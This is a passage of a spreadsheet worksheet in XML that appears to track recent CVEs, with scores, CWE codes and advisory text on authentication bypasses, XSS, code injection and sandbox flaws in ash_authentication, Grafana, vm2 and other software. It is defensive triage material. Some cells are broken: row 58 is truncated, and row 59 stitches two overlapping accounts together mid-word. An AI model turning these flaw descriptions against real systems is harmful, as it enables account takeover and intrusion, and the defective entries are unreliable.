          <t>CWE-290</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass by Spoofing vulnerability in team-alembic ash_authentication allows an attacker who can plant a remember-me cookie in a victim's browser to replace that victim's authenticated session with one for the attacker's own account.
AshAuthentication.Plug.Helpers.sign_in_using_remember_me/3 skips re-authenticating an already-signed-in visitor by checking the session for "&lt;subject_name&gt;_token", but store_in_session/2 writes that key only when require_token_presence_for_authentication? is enabled and otherwise writes the bare subject name. At the default setting the guard therefore reads a key that is never written, its already-signed-in branch is unreachable, and the remember-me sign-in runs on every request through the per-request browser pipeline plug. A planted remember-me cookie is consequently honoured even for a visitor holding a live authenticated session, so whatever the victim enters afterwards lands in data the attacker controls. The read path in authenticate_resource_from_session/4 selects the key correctly, so the guard and the reader disagree about which key holds the session.
This issue affects ash_authentication: from 4.10.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76949</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82761</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82761</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85500</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-305</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass by Primary Weakness vulnerability in team-alembic AshAuthentication allows an unconfirmed user to obtain a session, defeating a mandatory email confirmation requirement.
AshAuthentication.Strategy.Password.Actions.check_user/2 decides whether the attribute named by require_confirmed_with is set using a bare is_nil(Map.get(user, value)). When that attribute is not selected on the loaded record Map.get/2 returns %Ash.NotLoaded{}, and when a field policy denies it for the current actor it returns %Ash.ForbiddenField{}. Neither is nil, so the rejection branch is skipped and sign-i
require_confirmed_with is enforced in two places, and neither holds in every configuration. sign_in_with_token and register are checked only inside AshAuthentication.Strategy.Password.Actions, not on the action itself, so any caller that invokes the action directly skips the check. An API layer such as AshGraphql or AshJsonApi invokes the action directly, so this applies to the default configuration. Where a check does run it compares the confirmation attribute against nil. That attribute holds %Ash.NotLoaded{} or %Ash.ForbiddenField{} when it sets select_by_default?: false, when an API layer narrows the read's select, or when a field policy hides it from the sign-in actor. Neither struct is nil, so those configurations read every user as confirmed.
This issue affects ash_authentication: from 4.3.8 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85500</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86533</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>Insufficient Session Expiration vulnerability in team-alembic AshAuthentication and AshAuthentication Phoenix allows a revoked session to remain fully authenticated.
A resource configured with session_identifier :jti and require_token_presence_for_authentication? disabled stores its session value as &lt;jti&gt;:&lt;subject&gt;. The jti is there so that signing out can revoke that one session. Neither reader consults it: AshAuthentication.Plug.Helpers.authenticate_resource_from_session/4 and AshAuthentication.Phoenix.LiveSession.on_mount/4 both split the value with split_identifier/2, discard the jti and pass the bare subject to AshAuthentication.subject_to_user/3, which reloads the record. The token-presence branch of each function does check its token, calling AshAuthentication.TokenResource.Actions.get_token/3 with the jti and the purpose user. Because the revocation record is never read, neither its revoked state nor its expiry constrains the session, so a session captured before sign-out keeps working.
This issue affects ash_authentication: from 4.9.1 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14; ash_authentication_phoenix: from 2.10.0 before 2.17.4 and from 3.0.0-rc.0 before 3.0.0-rc.11.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86533</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88952</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>Improper Authentication vulnerability in team-alembic AshAuthentication allows an attacker to be signed in as another user by linking an OAuth2 identity to an account that is not theirs.
AshAuthentication.Strategy.OAuth2.UserResolver.resolve/3 matches an existing account using the register action's upsert_identity keys, then gates linking the incoming provider identity to it on email_trusted?/2, which reads only the provider's email_verified boolean and never compares the provider's email value with the matched account's email. That gate assumes the account was matched by its email field, so under any other upsert_identity it is vacuous and an attacker presenting their own verified email is attached to, and issued a session for, an account matched on some other attribute. The same unguarded gate applies in OAuth2.SignInPreparation on the registration_enabled? false path, where the account is matched by the sign-in action's read filter instead. The upsert also rewrites the matched account's email to the attacker's address, so later account recovery reaches the attacker rather than the owner.
This issue affects ash_authentication: from 4.14.0 before 4.15.0 and from 5.0.0-rc.10 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88952</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91039</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass by Spoofing vulnerability in team-alembic ash_authentication allows an attacker who operates one identity-provider connection of a dynamic_oidc strategy to be signed in as a local user established through a different connection.
The strategy is meant to keep each connection in its own identity namespace by writing every UserIdentity row's strategy field as "&lt;name&gt;/&lt;connection_id&gt;", but that namespacing never takes effect. __connection_id__ is populated only on the ephemeral runtime struct built per request in dynamic_oidc/plug.ex, and DynamicOidc.IdentityChange.change/3 re-fetches the strategy from the compile-time DSL through Info.strategy_for_action, yielding the persisted struct whose __connection_id__ is its defstruct default of nil. OAuth2.identity_strategy_name/1 therefore falls back to the bare strategy name for both the identity write and the reads in oauth2/user_resolver.ex and oauth2/sign_in_preparation.ex. Since the identity resource's unique key is (uid, strategy), one row exists per sub across every connection, and the identity-match branch runs before any email check. Neither strategy handles iss, so nothing else distinguishes the issuers: OpenID Connect Core section 5.7 makes sub unique only within an issuer, so two connections numbering subjects independently share one subject space.
This issue affects ash_authentication: from 5.0.0-rc.10 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91039</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92860</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in rcourtman Pulse up to 6.0.4/6.1.0-rc.4. Affected by this issue is the function fmt.Sprintf of the file /api/security/quick-setup of the component Quick Security Setup Handler. The manipulation of the argument Username results in improper input validation. The attack may be performed from remote. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92860</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45143</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>Chamilo LMS is an open-source learning management system. From 2.0.0 through at least 2.1.0, Chamilo LMS stores private Message.content without server-side sanitization and renders it as HTML in assets/vue/views/message/MessageShow.vue and public/main/template/default/message/view_message.html.twig. An authenticated low-privilege user, including a student, can directly address crafted message content to an administrator because the message creation flow permits a sender to select another user as the recipient. The content executes in the recipient's browser when the recipient opens the routine inbox or message view, without requiring a link click, and can expose session credentials or permit actions as the administrator. This vulnerability is fixed in 2.0.1.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45143</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47252</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>Anyquery is an SQL query engine built on top of SQLite. Prior to 0.4.5, authenticated users with INSERT or UPDATE access to affected macOS virtual tables can execute operating-system commands because the Chrome plugin and equivalent Brave, Edge, and Safari variants interpolate a SQL-controlled URL into AppleScript or JXA source passed to osascript. In plugins/chrome/tabs.go, tabsTable.Insert() passes the URL through fmt.Sprintf(newTabScript, url), and tabsTable.Update() uses fmt.Sprintf(setURLScript, pk, url). A URL containing quote and newline characters can break out of the intended string or property record and append script statements, resulting in arbitrary command execution with the privileges of the anyquery process on the macOS host. This issue is fixed in version 0.4.5.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47252</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77903</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>9</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2026-09-17</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by spoofing in Microsoft Dataverse allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77903</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88795</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>The wpShopGermany IT-RECHT KANZLEI WordPress plugin before 2.4 does not generate its API authentication token securely, deriving it from data the requester controls and creating it as a side effect of the check that is supposed to validate it, allowing unauthenticated attackers to predict the token and use the access it grants to write arbitrary files, leading to remote code execution.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88795</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92952</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>vm2 versions 3.11.4 through 3.11.6 incompletely filter Node.js registered internal symbols across the sandbox boundary. The extraction filters in lib/setup-sandbox.js and the cross-realm symbol checks and write traps in lib/bridge.js use a fixed list of known dangerous registered symbols that omits nodejs.stream.disturbed and nodejs.stream.errored, which are exposed on host WebStream prototypes on newer Node.js releases (validated on Node.js v25.8.0). When the embedder exposes a host WebStream object and the host stream/web module to the sandbox, sandbox code can obtain the real host symbols via Object.getOwnPropertySymbols(streamWeb.ReadableStream.prototype) and use them as write keys on host stream objects, corrupting host-visible stream state — for example making stream.Readable.isDisturbed() return false for an already-consumed stream. This can bypass host logic that relies on Node's public stream-state helpers to enforce one-shot body consumption, reject errored streams, or decide whether a stream is safe to hand to another component. It is not a host code-execution primitive in the reported proof of vulnerability. This is an incomplete fix for the earlier nodejs.* symbol filtering issue. Fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92952</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14850</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-640</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>The password reset funcionality is vulnerable to unauthorized account modification due to improper validation of the user_id parameter. An attacker can manipulate this predictable numeric identifier to reset passwords for arbitrary users without proving account ownership.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14850</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15815</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>security@grafana.com</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59, CWE-94</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>Grafana OSS and Grafana Enterprise did not safely resolve symbolic links when
extracting plugin archives. A crafted plugin archive can chain relative symbolic link
entries to escape the plugin installation directory, writing arbitrary files and an
executable backend binary outside that directory. The dropped executable runs with the
privileges of the Grafana server process, resulting in remote code execution.
Plugin archives are extracted before their signature is verified, so a valid plugin
signature does not prevent the write. An operator can therefore be affected by
installing a plugin that appears legitimate, as well as by installing a plugin from an
arbitrary archive using grafana-cli, the GF_INSTALL_PLUGINS environment variable, or
preinstall configuration.
Grafana Enterprise is affected because it includes the same plugin extraction code as
Grafana OSS.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15815</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25283</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>Memory Corruption when copying unverified data from an external source exceeds the allocated buffer size.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25283</t>
        </is>
      </c>
    </row>
